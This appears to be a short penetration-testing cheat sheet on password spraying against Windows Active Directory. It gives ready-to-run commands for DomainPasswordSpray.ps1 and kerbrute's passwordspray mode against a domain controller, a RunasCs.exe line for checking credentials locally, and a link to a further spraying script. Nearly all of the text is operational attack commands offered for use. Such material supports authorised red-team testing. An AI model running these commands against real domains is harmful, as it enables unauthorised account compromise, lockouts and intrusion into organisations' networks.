USING DOMAINPASSWORDSPRAY.PS1¶
- Import the DomainPasswordSpray module.
Import-Module .\DomainPasswordSpray.ps1
- Run the Invoke-DomainPasswordSpray command with the desired password and output file parameters.
Invoke-DomainPasswordSpray -Password [PASSWORD] -OutFile spray_success -ErrorAction SilentlyContinue
USING KERBRUTE FOR PASSWORD SPRAYING¶
- Execute the password spray attack:
kerbrute passwordspray -d example.local --dc [IP_ADDRESS] valid_users.txt [PASSWORD]
USING RUNASCS.EXE¶
-
RunasCs.exe can be used to check credentials locally without access to SMB, LDAP, WinRM, Kerberos, or any other authenticated Windows services.
.\RunasCs.exe Administrator notthepassword "cmd /c whoami"
-
Use spray-passwords.ps1 script: https://github.com/ZilentJack/Spray-Passwords/blob/master/Spray-Passwords.ps1